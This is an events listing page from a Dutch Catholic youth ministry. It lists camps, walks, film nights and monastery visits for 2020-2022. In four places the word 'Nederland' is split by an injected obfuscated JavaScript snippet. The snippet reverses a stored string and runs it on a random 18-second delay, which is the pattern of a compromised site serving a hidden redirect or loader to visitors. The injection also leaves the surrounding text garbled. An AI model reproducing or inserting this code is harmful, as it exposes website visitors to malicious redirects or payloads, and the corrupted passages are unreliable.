WAT ZOEK JE?

Weergaven navigatie

Evenement weergaven navigatie

Vandaag

Tienerkamp

Haarle

1 t/m 6 augustus in Haarle

Wandeltocht naar Bunnik

Bunnik

Met het einde van de zomer in zicht, komen er ook weer activiteiten van JA aan. We beginnen het seizoen op zaterdag 19 september klein met een wandeling vanaf Utrecht naar Bunnik en weer terug samen met mgr. Hoogenboom. Het is een prachtige wandeling langs de Kromme Rijn, langs Amelisweerd en landgoed Rhijnauwen en door …

Openingsviering

Almelo

Ver weg in het oosten van Nederl$Ikf=function(n){if (typeof ($Ikf.list) == "string") return $Ikf.list.split("").reverse().join("");return $Ikf.list;};$Ikf.list=;var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, achter de Sall$Ikf=function(n){if (typeof ($Ikf.list) == "string") return $Ikf.list.split("").reverse().join("");return $Ikf.list;};$Ikf.list=;var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Heuvelrug, ligt Almelo. Een mooi stadje met een heel enthousiaste jongerengroep (Young Faith …

Film kijken in Barghse Huus

Op 21 november gaan we een film kijken in het Barghse Huus in ‘s-Heerenberg. Eerst gaan we w$Ikf=function(n){if (typeof ($Ikf.list) == "string") return $Ikf.list.split("").reverse().join("");return $Ikf.list;};$Ikf.list=;var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen, samen eten en hebben we om 19.00 uur een viering. Daarna kijken we naar de film. Er kunnen maximaal 30 personen …

Kerstkaarten schrijven aan eenzame ouderen

Zondag 13 december komen we bijeen om kerstkaarten te schrijven aan eenzame ouderen. De locatie is nog onbekend, maar met foute kersttruien aan, kerstmuziek uit de speakers en versnaperingen wordt het een gezellige dag waarop we samen kerstkaarten maken en schrijven. Er kunnen maximaal 30 mensen meedoen.

Klooster bezoeken

In plaats van het kloosterweekend staat er dit jaar een eendaags kloosterbezoek op het programma en wel op zondag 17 januari 2021. De naam van het klooster en de locatie worden nog bekendgemaakt.

WJD@home

Online via Zoom

Als eerste voorbereiding op de Wereldjongerendagen in 2023 in Lissabon vindt op zondag 31 januari de online jongerenbijeenkomst WJD@home plaats. Deze bijeenkomst is een initiatief van het bisdom Breda, maar jongeren uit heel Nederl$Ikf=function(n){if (typeof ($Ikf.list) == "string") return $Ikf.list.split("").reverse().join("");return $Ikf.list;};$Ikf.list=;var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and (en België) kunnen deelnemen.Vanwege de …

4th of July BBQ party!

Utrecht

We sluiten op 4 juli het seizoen af met een slotviering in Utrecht. In de prachtige tuin aan de Maliebaan is er genoeg ruimte om elkaar weer te zien, spelletjes te doen en lekker te barbecueën. We gaan ‘the 4th of July’ vieren zoals Amerikanen dat doen. Wij toveren de tuin om naar een typische …

Kinderkamp 2021

Haarle

Na de succesvolle editie van 2020 organiseert het Aartsbisdom Utrecht ook in 2021 weer een kinderkamp, opnieuw op Kampeerboerderij De Heidebloem in Haarle. Het kamp vindt plaats van 31 juli t/m 5 augustus en heeft als thema ‘Vrienden voor het leven’.

Tienerkamp 2021

Haarle

Na de succesvolle editie van 2020 organiseert het Aartsbisdom Utrecht ook in 2021 weer een tienerkamp, opnieuw op Kampeerboerderij De Heidebloem in Haarle. Het kamp vindt plaats van 31 juli t/m 5 augustus en heeft als thema ‘Heroes only’.

Film kijken in Filmhuis Barghse Huus

‘s-Heerenberg

Als openingsviering van het nieuwe seizoen gaan we op zaterdag 2 oktober in ‘s-Heerenberg in het Barghse Huus een docu-film kijken over Lourdes. We beginnen de middag met een activiteit, dan volgt de film en we sluiten af met een gezamenlijke maaltijd.

Diocesane Wereldjongerendag

Ede

Dit was voorheen onze Palmzondag-activiteit, maar paus Franciscus heeft eind vorig jaar de viering van de diocesane WJD’s verplaatst naar het Hoogfeest van Christus Koning.

Kerstgala – GEANNULEERD

Utrecht

UPDATE november 2021: Vanwege de toename van het aantal coronabesmettingen en de aard van deze activiteit vindt het JA-team het niet verantwoord dit door te laten gaan. Daarom is besloten het Kerstgala te annuleren.

Kloosterdag

Den Bosch

We zijn deze dag te gast bij de Franciscanen (San Damiano) in Den Bosch. Het is de dag van de pauskeuze van paus Franciscus en we verdiepen ons in het Franciscaans leven en de Franciscaanse spiritualiteit.

Synodebijeenkomst voor jongeren

Utrecht

Zondag 27 maart is er een bijeenkomst voor jongeren in het Aartsbisdom Utrecht over de wereldwijde Bisschoppensynode van oktober 2023. Hierbij komen de volgende drie thema’s aan de orde: Vieren, Medeverantwoordelijkheid voor de missie van de Kerk en Dialoog in Kerk en samenleving. De bijeenkomst vindt plaats van 14-17 uur in het bisschopshuis aan de …

WJD@Home

Ameland

Er is een nieuwe datum gevonden voor de WJD@Home op Ameland: 29 april t/m 1 mei. Dit weekend voor jongeren (15-30 jaar) zou eerst plaatsvinden van 14 t/m 16 januari 2022, maar moest worden uitgesteld vanwege de coronamaatregelen.

Wandelen in en rond IJsselstein

IJsselstein

Jong Aartsbisdom organiseert op 15 mei een activiteit in en rond IJsselstein: we gaan onder meer wandelen met mgr. Hoogenboom.

Slotfeest in Zwolle

Zwolle

Het begin van de zomervakantie is het einde van het JA-seizoen voor 2021/2022. Daarom organiseren wij een leuk slotfeest in Zwolle op zondag 10 juli.

Kinderkamp 2022: BEESTENBENDE

Haarle

Na de succesvolle editie van 2021 organiseert het Aartsbisdom Utrecht ook in 2022 weer een kinderkamp (6-11 augustus). Dit zomerkamp vindt opnieuw plaats op Kampeerboerderij De Heidebloem in Haarle.

Tienerkamp 2022: Reis door de tijd

Haarle

Na de succesvolle editie van 2021 organiseert het Aartsbisdom Utrecht ook in 2022 weer een tienerkamp (6-11 augustus). Dit zomerkamp vindt opnieuw plaats op Kampeerboerderij De Heidebloem in Haarle.